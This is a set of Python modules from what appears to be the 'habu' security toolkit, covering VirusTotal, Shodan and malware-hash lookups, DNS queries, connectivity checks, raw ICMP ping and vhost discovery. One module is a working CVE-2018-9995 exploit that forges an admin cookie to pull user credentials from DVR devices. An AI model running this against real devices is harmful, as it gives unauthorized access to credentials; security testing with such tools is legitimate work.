import hashlib
import json
import logging
import os
import sys
from pathlib import Path
from time import sleep

import click
import requests

from habu.lib.loadcfg import loadcfg


@click.command()
@click.argument('input', type=click.File('rb'))
@click.option('-o', 'output', type=click.File('w'), default='-', help='Output file (default: stdout)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_shodan(input, output, verbose):

    habucfg = loadcfg()

    if 'VIRUSTOTAL_APIKEY' not in habucfg:
        logging.error('You must provide a virustotal apikey. Use the ~/.habu.json file (variable VIRUSTOTAL_APIKEY), or export the variable HABU_VIRUSTOTAL_APIKEY')
        sys.exit(1)

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    filename = Path(input.name).name

    data = input.read()

    sha256 = hashlib.sha256(data).hexdigest()

    logging.info('Verifying if hash already submitted: {}'.format(sha256))

    params = {'apikey': habucfg['VIRUSTOTAL_APIKEY'], 'resource': sha256}
    response = requests.post('https://www.virustotal.com/vtapi/v2/file/rescan', params=params)
    json_response = response.json()

    if json_response['response_code'] == 0:
        files = {'file': (filename, data)}
        params = {'apikey': habucfg['VIRUSTOTAL_APIKEY']}
        response = requests.post('https://www.virustotal.com/vtapi/v2/file/scan', files=files, params=params)
        json_response = response.json()

        resource = json_response['resource']

    logging.info('Waiting/retrieving the report...')

    while True:
        params = {'apikey': habucfg['VIRUSTOTAL_APIKEY'], 'resource': sha256}
        response = requests.get('https://www.virustotal.com/vtapi/v2/file/report', params=params)
        json_response = response.json()

        if json_response['response_code'] == 1:
            break

        sleep(5)

    output.write(json.dumps(json_response, indent=4, sort_keys=True))
    output.write('\n')

if __name__ == '__main__':
    cmd_shodan()



from habu.lib.tomorrow3 import threads
import dns.resolver
import dns.zone
from time import sleep


@threads(50)
def __threaded_query(hostname):
    try:
        answer = dns.resolver.query(hostname)
        return answer
    except Exception:
        return None


def query_bulk(names):

    answers = [__threaded_query(name) for name in names]

    while True:
        if all([ a.done() for a in answers]):
            break
        sleep(1)

    return [answer.result() for answer in answers]

    #for answer in answers:
    #    print(answer.result())




import codecs

import click


@click.command()
@click.argument('f', type=click.File('r'))
def cmd_hex2ascii(f):

    data = f.read()

    if not data:
        print("Empty file or string!")
        return 1

    data = data.replace(' ', '')
    data = data.replace('\n', '')

    decoded = codecs.decode(data, "hex")

    print(decoded.decode("utf-8", errors='ignore'))


if __name__ == '__main__':
    cmd_hex2ascii()



import ipaddress
#from habu.lib.ip2asn import ip2asn
import json
import logging
import socket
import sys

import click
import requests


@click.command()
@click.argument('host')
def cmd_karma(host):

    URL = 'https://karma.securetia.com/api/ip/'

    try:
        resolved = socket.gethostbyname(host)
    except Exception:
        logging.error('Invalid IP address or hostname')
        sys.exit(1)

    if host != resolved:
        print(host, '->', resolved, file=sys.stderr)

    r = requests.get(URL + resolved, headers={'Accept': 'application/json'})

    if r.status_code != 200:
        logging.error('HTTP Error code received: {}'.format(r.status_code))
        sys.exit(1)

    print(json.dumps(r.json(), indent=4))

if __name__ == '__main__':
    cmd_karma()



import pwd
import os
from pathlib import Path
import json
import sys

def loadcfg():

    cfg = {}

    homedir = Path(pwd.getpwuid(os.getuid()).pw_dir)
    cfgfile = homedir / '.habu.json'

    if cfgfile.is_file():
        #print('file exists!')
        with cfgfile.open() as f:
            try:
                cfg = json.loads(f.read())
            except Exception as e:
                print('exception', e, file=sys.stderr)

    for k,v in os.environ.items():
        if k.startswith('HABU_'):
            k = k.replace('HABU_', '')
            cfg[k] = v
            #print(k,v)

    return cfg

if __name__ == '__main__':
    loadcfg()



import json
import logging
import os
import os.path
import pwd
import sys

import click
import requests
import requests_cache

from habu.lib.loadcfg import loadcfg


@click.command()
@click.argument('ip')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-o', 'output', type=click.File('w'), default='-', help='Output file (default: stdout)')
def cmd_shodan(ip, no_cache, verbose, output):

    habucfg = loadcfg()

    if 'SHODAN_APIKEY' not in habucfg:
        print('You must provide a shodan apikey. Use the ~/.habu.json file (variable SHODAN_APIKEY), or export the variable HABU_SHODAN_APIKEY')
        sys.exit(1)

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if not no_cache:
        homedir = pwd.getpwuid(os.getuid()).pw_dir
        requests_cache.install_cache(homedir + '/.habu_requests_cache')

    url = 'https://api.shodan.io/shodan/host/{}?key={}'.format(ip, habucfg['SHODAN_APIKEY'])

    r = requests.get(url)

    if r.status_code not in [200, 404]:
        print('ERROR', r)
        return False

    if r.status_code == 404:
        print("Not Found")
        return False

    data = r.json()

    output.write(json.dumps(data, indent=4))
    output.write('\n')

if __name__ == '__main__':
    cmd_shodan()



import hashlib
import json
import logging
import re
import socket
from pathlib import Path
from time import gmtime, strftime

import click

from habu.lib.loadcfg import loadcfg


def get_cymru(this_hash):
    """
    Example Output::
        {
            'detected': '86',
            'last_seen': '01-06-2014T22:34:57Z'
        }
    source: http://code.google.com/p/malwarecookbook/
    site : http://www.team-cymru.org/Services/MHR/
    """
    host = 'hash.cymru.com'
    request = '%s\r\n' % this_hash
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, 43))
        s.send('begin\r\n'.encode())
        s.recv(1024)
        s.send(request.encode())
        response = s.recv(1024)
        s.send('end\r\n'.encode())
        s.close()
        if len(response) > 0:
            resp_re = re.compile('\S+ (\d+) (\S+)')
            match = resp_re.match(response.decode())
            if 'NO_DATA' in match.group(2):
                return dict(last_seen_utc=strftime("%Y-%m-%dT%H:%M:%SZ",
                                           gmtime(int(match.group(1)))),
                                           detected=match.group(2),
                                           response_code=404)
            else:
                return dict(last_seen_utc=strftime("%Y-%m-%dT%H:%M:%SZ",
                                           gmtime(int(match.group(1)))),
                                           detected=match.group(2),
                                           response_code=200)
    except socket.error:
        return dict(error='socket error', response_code=500)


@click.command()
@click.argument('input', type=click.File('rb'))
@click.option('-o', 'output', type=click.File('w'), default='-', help='Output file (default: stdout)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_shodan(input, output, verbose):

    habucfg = loadcfg()

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    filename = Path(input.name).name

    data = input.read()

    sha1 = hashlib.sha1(data).hexdigest()

    output.write(json.dumps(get_cymru(sha1), indent=4, sort_keys=True))
    output.write('\n')

if __name__ == '__main__':
    cmd_shodan()



import json
import os
import os.path
from pathlib import Path

import click

from habu.lib.webid import webid

@click.command()
@click.argument('url')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-o', 'output', type=click.File('w'), default='-', help='Output file (default: stdout)')
def cmd_webid(url, no_cache, verbose, output):
    response = webid(url, no_cache, verbose)
    output.write(json.dumps(response, indent=4))
    output.write('\n')

if __name__ == '__main__':
    cmd_webid()



import requests
import socket

dns_servers = ['8.8.8.8', '8.8.4.4']
ftp_servers = ['ftp.debian.org', 'ftp.redhat.com']
http_servers = ['www.google.com', 'www.ibm.com']
ssh_servers = ['www.github.com']

socket.setdefaulttimeout(2)

def check_ip():
    for server in dns_servers:
        try:
            socket.create_connection((server, 53), 5)
            return True
        except socket.timeout:
            pass

    return False


def check_dns():
    for server in http_servers:
        try:
            socket.gethostbyname(server)
            return True
        except Exception:
            pass

    return False


def check_http():
    for server in http_servers:
        try:
            requests.get('http://' + server)
            return True
        except Exception:
            pass

    return False


def check_https():
    for server in http_servers:
        try:
            requests.get('https://' + server)
            return True
        except Exception:
            pass

    return False


def check_ftp():
    for server in ftp_servers:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((server, 21))
            return True
        except Exception:
            pass

    return False


def check_ssh():
    for server in ssh_servers:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(('sdf.org', 22))
            return True
        except Exception:
            pass

    return False


if __name__ == '__main__':
    print(check_ip())
    print(check_dns())
    print(check_ftp())
    print(check_http())
    print(check_https())




import json
import sys

import click
import requests

details = '''
 # This module it's totally based on the work of Ezequiel Fernandez (@capitan_alfa)
 # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995
'''

@click.command()
@click.argument('ip')
@click.option('-p', 'port', default=80, help='Port to use (default: 80)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_cve_2018_9995(ip, port, verbose):

    url = 'http://' + ip + ':' + str(port)
    fullhost = url + '/device.rsp?opt=user&cmd=list'

    headers = {
        'Host': ip,
        'User-Agent': 'Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Languag': 'es-AR,en-US;q=0.7,en;q=0.3',
        'Connection': 'close',
        'Content-Type': 'text/html',
        'Cookie': 'uid=admin',
    }

    try:
        r = requests.get(fullhost, headers=headers,timeout=10.000)
    except Exception as e:
        print('Exception:', e)
        sys.exit(1)

    try:
        data = r.json()
    except Exception as e:
        print('Exception:', e)
        sys.exit(1)

    print(json.dumps(data["list"], indent=4))


if __name__ == '__main__':
    cmd_cve_2018_9995()




import logging
from time import sleep

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ICMP, IP, conf, sr1, L3RawSocket


@click.command()
@click.argument('ip')
@click.option('-i', 'interface', default=None, help='Wich interface to use (default: auto)')
@click.option('-c', 'count', default=0, help='How many packets send (default: infinit)')
@click.option('-t', 'timeout', default=2, help='Timeout in seconds (default: 2)')
@click.option('-w', 'wait', default=1, help='How many seconds between packets (default: 1)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_ping(ip, interface, count, timeout, wait, verbose):

    if interface:
        conf.iface = interface

    conf.verb = False
    conf.L3socket=L3RawSocket

    layer3 = IP()
    layer3.dst = ip
    layer3.tos = 0
    layer3.id = 1
    layer3.flags = 0
    layer3.frag = 0
    layer3.ttl = 64
    layer3.proto = 1 # icmp

    layer4 = ICMP()
    layer4.type = 8 # echo-request
    layer4.code = 0
    layer4.id = 0
    layer4.seq = 0

    pkt = layer3 / layer4

    counter = 0

    while True:
        ans = sr1(pkt, timeout=timeout)
        if ans:
            if verbose:
                ans.show()
            else:
                print(ans.summary())
            del(ans)
        else:
            print('Timeout')

        counter += 1

        if count != 0 and counter == count:
            break

        sleep(wait)

    return True

if __name__ == '__main__':
    cmd_ping()



import json
import logging
import socket
import sys

import click

from habu.lib.vhosts import get_vhosts


@click.command()
@click.argument('host')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-p', 'pages', default=10, help='Pages count (Default: 10)')
@click.option('-f', 'first', default=1, help='First result to get (Default: 1)')
def cmd_vhosts(host, no_cache, pages, first):

    try:
        resolved = socket.gethostbyname(host)
    except Exception:
        logging.error('Invalid IP address or hostname')
        sys.exit(1)

    if host != resolved:
        print(host, '->', resolved, file=sys.stderr)

    vhosts = []

    for num in range(pages):
        vhosts += get_vhosts(resolved, no_cache=no_cache, first=first+num*10)

    vhosts = list(set(vhosts))

    print(json.dumps(vhosts, indent=4))

if __name__ == '__main__':
    cmd_vhosts()
